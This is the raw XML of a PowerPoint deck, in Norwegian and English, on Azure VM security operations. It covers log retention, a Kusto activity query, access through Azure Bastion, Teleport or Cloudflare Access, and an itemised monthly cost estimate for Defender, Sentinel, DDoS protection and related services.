            <a:pPr marL="625475" marR="0" lvl="1" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4472C4"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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Should still be routed to Log Analytics for longtime retention</a:t>
            </a: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5600" marR="0" lvl="0" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:prstClr val="black"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F974BEF8-5C45-4522-9E77-B7261393344E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4980312" y="1732473"/>
            <a:ext cx="6317362" cy="1988799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TekstSylinder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895344F4-1B51-4D08-B6BC-1F1DE6D783D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044246" y="4032204"/>
            <a:ext cx="6097712"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rPr>
              <a:t>Kusto Query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AzureActivity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 where CategoryValue == "Administrative"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 where ResourceGroup contains "noenoe-rg"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3089430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45793E-8E14-4A90-BE7D-52C4B0C20EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access to the virtual machines?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48618615-6227-4736-BF99-68C52E5DDE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619649" y="1407026"/>
            <a:ext cx="6254876" cy="544764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2000" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Offentlig IP?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2000" b="1" i="0" u="none" strike="sng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2000" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NAT IP?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2000" b="1" i="0" u="none" strike="sng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2000" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JIT (Just-in-time </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="2000" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="2000" b="1" i="0" u="none" strike="sng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rPr>
              <a:t>Azure Bastion</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Support for native client with standard SKU</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rPr>
              <a:t>CLI </a:t>
            </a:r>
            <a:r>
              <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nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>az network bastion rdp</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Requires Reader Role on VMen</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Fun fact: Based upon Apache Guacamole</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rPr>
              <a:t>Teleport or Cloudflare Access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Supports other protocols (TCP/UDP)</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Supports integration with Azure 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6" name="AutoShape 6" descr="Accessing private networks with Cloudflare Tunnel and WARP">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B78C950-EC09-46BB-BEFE-F3B033D0BE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Bilde 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7D32CC-ACA4-4F49-910F-DB39E9054842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5848460" y="1569377"/>
            <a:ext cx="5723891" cy="2530012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10827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45793E-8E14-4A90-BE7D-52C4B0C20EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cool, so what does it cost? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Bilderesultat for my eyes burn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB72AC6-224E-474D-AA93-23AD5F2953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8501" y="1748653"/>
            <a:ext cx="3998165" cy="39981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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04083621-DC9D-408C-9085-5731EDBC0197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881207" y="1381393"/>
            <a:ext cx="5905924" cy="504753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rPr>
              <a:t>Example: (per month)</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nb-NO" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1 VM (4vCPU, 16GB) = 2800,-</a:t>
            </a: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b-NO" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Storage, network</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Backup</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (250 GB, 30 dager) = 193,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Defender for 1 server = 120,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Sentinel (~1-3 GB a month) = 51,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (100 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IPer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) = 25500,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure AD for PIM P2 = 77,-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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Traffic Analysis 1GB) = 30,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Guest</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Configuration Azure Policy = 52,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Bastion Standard SKU = 1834,-</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nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Azure Automation (Free for 5 nodes)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nb-NO" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Totalt = 27857,- (+ 2800) for the one machine)</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nb-NO" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>But! Some big adjustments happening here soon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2000" b="1"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83825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912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D976C13-68E6-4E25-B13E-FC3A2D3F66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0EBAE0B-DD72-4094-8934-3B46A9142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2D2C9-9374-48AF-A93F-F082E2192D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="770467"/>
            <a:ext cx="10782300" cy="3294159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="558406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67891561-599D-4072-BB8A-006EC2F01E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1752943" y="794779"/>
            <a:ext cx="9471967" cy="5470387"/>
            <a:chOff x="2449990" y="1630118"/>
            <a:chExt cx="7631009" cy="4368924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Arc 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5FA3804-D61C-42DD-BFC7-4A09892C8C0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="11628291">
              <a:off x="5058093" y="5108855"/>
              <a:ext cx="1314152" cy="534013"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 15117534"/>
                <a:gd name="adj2" fmla="val 180946"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="2">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val 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571C2E84-ADBD-44A9-BED2-AD73350A2983}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4776708" y="3981760"/>
              <a:ext cx="1903737" cy="7912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dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Year wheel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2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>2022/23</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3FAFB6-A793-479B-A6C9-D426DDABF496}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3982590" y="2118585"/>
              <a:ext cx="3498811" cy="3504915"/>
              <a:chOff x="4488233" y="2298947"/>
              <a:chExt cx="2929124" cy="2866327"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F4F908-F116-4755-8D40-B472483A864E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4800786" y="2605564"/>
                <a:ext cx="2298902" cy="2248940"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
                  <a:gd name="adj" fmla="val 7578"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:no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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Shape 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FC9487-2D64-48BC-9591-F0D3E7E7E7C0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4499219" y="2307237"/>
                <a:ext cx="2911788" cy="2851687"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
                  <a:gd name="adj" fmla="val 7578"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" cap="flat" cmpd="sng">
                <a:solidFill>
